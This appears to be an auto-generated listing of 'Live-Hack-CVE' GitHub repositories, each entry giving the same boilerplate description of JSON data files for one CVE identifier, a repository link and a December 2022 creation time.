**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-10011 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-10011](https://github.com/Live-Hack-CVE/CVE-2020-10011) create time: 2022-12-24T15:07:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-10002 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-10002](https://github.com/Live-Hack-CVE/CVE-2020-10002) create time: 2022-12-24T15:07:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-0009 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-0009](https://github.com/Live-Hack-CVE/CVE-2020-0009) create time: 2022-12-24T15:07:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-0003 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-0003](https://github.com/Live-Hack-CVE/CVE-2020-0003) create time: 2022-12-24T15:07:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-0093 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-0093](https://github.com/Live-Hack-CVE/CVE-2020-0093) create time: 2022-12-24T15:07:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-0181 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-0181](https://github.com/Live-Hack-CVE/CVE-2020-0181) create time: 2022-12-24T15:06:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-0198 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-0198](https://github.com/Live-Hack-CVE/CVE-2020-0198) create time: 2022-12-24T15:06:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-10007 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-10007](https://github.com/Live-Hack-CVE/CVE-2020-10007) create time: 2022-12-24T15:06:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-10009 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-10009](https://github.com/Live-Hack-CVE/CVE-2020-10009) create time: 2022-12-24T15:06:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-10010 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-10010](https://github.com/Live-Hack-CVE/CVE-2020-10010) create time: 2022-12-24T15:06:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-10012 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-10012](https://github.com/Live-Hack-CVE/CVE-2020-10012) create time: 2022-12-24T15:06:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-10014 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-10014](https://github.com/Live-Hack-CVE/CVE-2020-10014) create time: 2022-12-24T15:06:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-17380 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-17380](https://github.com/Live-Hack-CVE/CVE-2020-17380) create time: 2022-12-24T14:34:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-8745 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-8745](https://github.com/Live-Hack-CVE/CVE-2020-8745) create time: 2022-12-24T14:32:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-14305 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-14305](https://github.com/Live-Hack-CVE/CVE-2020-14305) create time: 2022-12-24T14:31:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-29129 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-29129](https://github.com/Live-Hack-CVE/CVE-2020-29129) create time: 2022-12-24T14:31:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-2798 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-2798](https://github.com/Live-Hack-CVE/CVE-2020-2798) create time: 2022-12-24T14:25:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-2884 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-2884](https://github.com/Live-Hack-CVE/CVE-2020-2884) create time: 2022-12-24T14:25:40Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-2963 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-2963](https://github.com/Live-Hack-CVE/CVE-2020-2963) create time: 2022-12-24T14:25:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-2915 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-2915](https://github.com/Live-Hack-CVE/CVE-2020-2915) create time: 2022-12-24T14:25:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-2787 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-2787](https://github.com/Live-Hack-CVE/CVE-2020-2787) create time: 2022-12-24T14:25:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-2828 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-2828](https://github.com/Live-Hack-CVE/CVE-2020-2828) create time: 2022-12-24T14:25:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-2883 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-2883](https://github.com/Live-Hack-CVE/CVE-2020-2883) create time: 2022-12-24T14:25:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-2785 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-2785](https://github.com/Live-Hack-CVE/CVE-2020-2785) create time: 2022-12-24T14:25:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-2783 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-2783](https://github.com/Live-Hack-CVE/CVE-2020-2783) create time: 2022-12-24T14:25:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-2786 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-2786](https://github.com/Live-Hack-CVE/CVE-2020-2786) create time: 2022-12-24T14:24:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-2771 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-2771](https://github.com/Live-Hack-CVE/CVE-2020-2771) create time: 2022-12-24T14:24:50Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-36913 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-36913](https://github.com/Live-Hack-CVE/CVE-2021-36913) create time: 2022-12-24T15:13:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-40394 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-40394](https://github.com/Live-Hack-CVE/CVE-2021-40394) create time: 2022-12-24T15:07:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-46671 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-46671](https://github.com/Live-Hack-CVE/CVE-2021-46671) create time: 2022-12-24T14:33:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-44444 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-44444](https://github.com/Live-Hack-CVE/CVE-2021-44444) create time: 2022-12-24T14:32:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-44040 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-44040](https://github.com/Live-Hack-CVE/CVE-2021-44040) create time: 2022-12-24T14:32:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-44759 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-44759](https://github.com/Live-Hack-CVE/CVE-2021-44759) create time: 2022-12-24T14:32:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-43566 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-43566](https://github.com/Live-Hack-CVE/CVE-2021-43566) create time: 2022-12-24T14:32:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-42704 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-42704](https://github.com/Live-Hack-CVE/CVE-2021-42704) create time: 2022-12-24T14:32:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-40444 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-40444](https://github.com/Live-Hack-CVE/CVE-2021-40444) create time: 2022-12-24T14:32:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-37149 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-37149](https://github.com/Live-Hack-CVE/CVE-2021-37149) create time: 2022-12-24T14:32:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-37148 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-37148](https://github.com/Live-Hack-CVE/CVE-2021-37148) create time: 2022-12-24T14:31:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-37147 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-37147](https://github.com/Live-Hack-CVE/CVE-2021-37147) create time: 2022-12-24T14:31:53Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-26120 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-26120](https://github.com/Live-Hack-CVE/CVE-2021-26120) create time: 2022-12-24T14:31:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-26119 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-26119](https://github.com/Live-Hack-CVE/CVE-2021-26119) create time: 2022-12-24T14:31:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-21255 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-21255](https://github.com/Live-Hack-CVE/CVE-2021-21255) create time: 2022-12-24T14:30:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-20030 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-20030](https://github.com/Live-Hack-CVE/CVE-2021-20030) create time: 2022-12-24T14:27:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-30496 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-30496](https://github.com/Live-Hack-CVE/CVE-2021-30496) create time: 2022-12-24T14:26:50Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-20599 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-20599](https://github.com/Live-Hack-CVE/CVE-2021-20599) create time: 2022-12-24T14:26:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-20597 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-20597](https://github.com/Live-Hack-CVE/CVE-2021-20597) create time: 2022-12-24T14:25:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-20594 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-20594](https://github.com/Live-Hack-CVE/CVE-2021-20594) create time: 2022-12-24T14:25:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-43766 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-43766](https://github.com/Live-Hack-CVE/CVE-2021-43766) create time: 2022-12-24T14:24:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37999 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37999](https://github.com/Live-Hack-CVE/CVE-2022-37999) create time: 2022-12-24T15:16:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37998 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37998](https://github.com/Live-Hack-CVE/CVE-2022-37998) create time: 2022-12-24T15:16:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40494 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40494](https://github.com/Live-Hack-CVE/CVE-2022-40494) create time: 2022-12-24T15:16:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40921 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40921](https://github.com/Live-Hack-CVE/CVE-2022-40921) create time: 2022-12-24T15:15:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37979 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37979](https://github.com/Live-Hack-CVE/CVE-2022-37979) create time: 2022-12-24T15:15:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20436 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20436](https://github.com/Live-Hack-CVE/CVE-2022-20436) create time: 2022-12-24T15:15:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20437 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20437](https://github.com/Live-Hack-CVE/CVE-2022-20437) create time: 2022-12-24T15:15:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41408 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41408](https://github.com/Live-Hack-CVE/CVE-2022-41408) create time: 2022-12-24T15:15:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41407 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41407](https://github.com/Live-Hack-CVE/CVE-2022-41407) create time: 2022-12-24T15:15:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37980 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37980](https://github.com/Live-Hack-CVE/CVE-2022-37980) create time: 2022-12-24T15:15:40Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41530 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41530](https://github.com/Live-Hack-CVE/CVE-2022-41530) create time: 2022-12-24T15:15:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41406 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41406](https://github.com/Live-Hack-CVE/CVE-2022-41406) create time: 2022-12-24T15:15:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41532 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41532](https://github.com/Live-Hack-CVE/CVE-2022-41532) create time: 2022-12-24T15:15:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37981 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37981](https://github.com/Live-Hack-CVE/CVE-2022-37981) create time: 2022-12-24T15:15:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37982 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37982](https://github.com/Live-Hack-CVE/CVE-2022-37982) create time: 2022-12-24T15:15:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37997 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37997](https://github.com/Live-Hack-CVE/CVE-2022-37997) create time: 2022-12-24T15:15:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-42711 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-42711](https://github.com/Live-Hack-CVE/CVE-2022-42711) create time: 2022-12-24T15:15:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-22035 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-22035](https://github.com/Live-Hack-CVE/CVE-2022-22035) create time: 2022-12-24T15:15:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-30198 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-30198](https://github.com/Live-Hack-CVE/CVE-2022-30198) create time: 2022-12-24T15:15:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-24504 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-24504](https://github.com/Live-Hack-CVE/CVE-2022-24504) create time: 2022-12-24T15:15:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-33634 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-33634](https://github.com/Live-Hack-CVE/CVE-2022-33634) create time: 2022-12-24T15:15:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37977 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37977](https://github.com/Live-Hack-CVE/CVE-2022-37977) create time: 2022-12-24T15:14:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37978 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37978](https://github.com/Live-Hack-CVE/CVE-2022-37978) create time: 2022-12-24T15:14:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-28866 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-28866](https://github.com/Live-Hack-CVE/CVE-2022-28866) create time: 2022-12-24T15:14:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3208 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3208](https://github.com/Live-Hack-CVE/CVE-2022-3208) create time: 2022-12-24T15:14:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3154 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3154](https://github.com/Live-Hack-CVE/CVE-2022-3154) create time: 2022-12-24T15:14:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41034 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41034](https://github.com/Live-Hack-CVE/CVE-2022-41034) create time: 2022-12-24T15:14:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41033 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41033](https://github.com/Live-Hack-CVE/CVE-2022-41033) create time: 2022-12-24T15:14:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37617 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37617](https://github.com/Live-Hack-CVE/CVE-2022-37617) create time: 2022-12-24T15:14:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41031 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41031](https://github.com/Live-Hack-CVE/CVE-2022-41031) create time: 2022-12-24T15:14:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-10228 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-10228](https://github.com/Live-Hack-CVE/CVE-2016-10228) create time: 2022-12-24T13:46:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-17956 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-17956](https://github.com/Live-Hack-CVE/CVE-2018-17956) create time: 2022-12-24T13:53:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-19785 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-19785](https://github.com/Live-Hack-CVE/CVE-2019-19785) create time: 2022-12-24T13:54:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-19787 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-19787](https://github.com/Live-Hack-CVE/CVE-2019-19787) create time: 2022-12-24T13:54:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-5477 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-5477](https://github.com/Live-Hack-CVE/CVE-2019-5477) create time: 2022-12-24T13:53:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-19786 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-19786](https://github.com/Live-Hack-CVE/CVE-2019-19786) create time: 2022-12-24T13:53:50Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-36322 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-36322](https://github.com/Live-Hack-CVE/CVE-2020-36322) create time: 2022-12-24T13:53:47Z

